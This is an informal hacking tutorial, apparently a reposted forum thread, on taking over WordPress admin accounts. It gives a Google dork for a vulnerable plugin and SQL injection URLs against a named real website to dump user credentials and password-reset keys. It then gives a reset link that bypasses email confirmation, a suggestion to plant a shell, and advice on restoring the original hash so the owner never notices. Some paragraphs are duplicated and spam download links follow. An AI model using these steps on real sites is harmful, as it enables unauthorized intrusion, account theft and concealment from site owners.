ok so .. as the title says .. im going to show u .. how to hack a wordpress site .. without cracking the hashes ..
now .. this works with all the wordpress sqli exploits ever posted in any of its themes or plugins ..
Point to remember:
you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 .. yea .. u heard it right .. released this month ..
now there are still tons of websites out there which haven't been updated yet ..
all the previous version can be exploited using this method ..
So .. lets start ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe
1) My Dork
There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is ..
now .. this works with all the wordpress sqli exploits ever posted in any of its themes or plugins ..
Point to remember:
you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 .. yea .. u heard it right .. released this month ..
now there are still tons of websites out there which haven't been updated yet ..
all the previous version can be exploited using this method ..
So .. lets start ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe
1) My Dork
There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is ..
Code:
inurl:"/?fbconnect_action=myhome"
now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..
2) now the website im going to use here is ..
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
![[IMG]](http://makman.host56.com/mak/thread/1/1.PNG)
here the parameter userid is vulnerable to sqli ..
so lets see what we can get from the data base ..
im going to change the above URL with this
Code:
http://masaru.ikeda.me/?fbconnect_a...a,user_email),7,8,9,10,11,12 from wp_users--
now u can see we got the username with the email id ..
![[IMG]](http://makman.host56.com/mak/thread/1/2.PNG)
now if i change the above URL to this ..
Code:
http://masaru.ikeda.me/?fbconnect_a...3a,user_pass),7,8,9,10,11,12 from wp_users--
im going to get the user name and the hashed password ..
![[IMG]](http://makman.host56.com/mak/thread/1/3.PNG)
(point to be noted here .. im using concat here .. u can also use group_concat to get all the users..
again .. that would be ur knowledge how u use sqli)
now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5)
and are very hard to crack ..
but if ur mad .. u should think out of the box ..
so now follow the steps ..
a) go to the login page of of wordpress site .. in my case that would be ..
Code:
http://masaru.ikeda.me/wp-login.php
b) click on Lost your password ?
![[IMG]](http://makman.host56.com/mak/thread/1/4.PNG)
c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username ..
![[IMG]](http://makman.host56.com/mak/thread/1/5.PNG)
d) now look closely .. it says .. "Check your e-mail for the confirmation link."
![[IMG]](http://makman.host56.com/mak/thread/1/6.PNG)
e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key ..
f) so now im going to change my URL to this .. to get the activation key ..
Code:
http://masaru.ikeda.me/?fbconnect_a...tivation_key),7,8,9,10,11,12 from wp_users--
and u can see .. we got the activation key here .. u should note it down somewhere ..
![[IMG]](http://makman.host56.com/mak/thread/1/7.PNG)
g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL ..
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be ..
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
and VOILA .. the wordpress will ask u for ur new password ..
![[IMG]](http://makman.host56.com/mak/thread/1/8.PNG)
now go the login page again .. and try the new password .. and there u go .. u got access to the panel ..
![[IMG]](http://makman.host56.com/mak/thread/1/9.PNG)
now u know how to shell the wordpress site .. don't u ??
Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. goto the login page and see .. if there is an option there to go back to the main page of the blog.. like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me ..
Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. goto the login page and see .. if there is an option there to go back to the main page of the blog.. like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me ..
![[IMG]](http://makman.host56.com/mak/thread/1/10.PNG)
2) once u have shelld the website .. get the database details .. use any database connector .. go to the table .. wp_user .. and in the column wp_pass .. replace the hash with the one u got in the very beginning .. the actual hash of the admin .. now the password will be again what it was before .. as nothing happened .. admin will never know what hit 'em ..
Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
yea i know its sad .. but don't worry .. someone will definitely discover any new way to work this out ..
thank u so much for viewing this thread .. if u find any trouble doing this .. hit me on FB or MSN .. contact details in my sig .. and don't try to use it on the same website i did .. because i already f***d it .. go and get ur own ..
atleast give credits ..
ReplyDeletehttp://www.madleets.com/Thread-Hacking-Wordpress-Without-Cracking-the-hashes
peace .. MakMan
Trickzzone: Hack Wordpress Without Cracking Hashes >>>>> Download Now
ReplyDelete>>>>> Download Full
Trickzzone: Hack Wordpress Without Cracking Hashes >>>>> Download LINK
>>>>> Download Now
Trickzzone: Hack Wordpress Without Cracking Hashes >>>>> Download Full
>>>>> Download LINK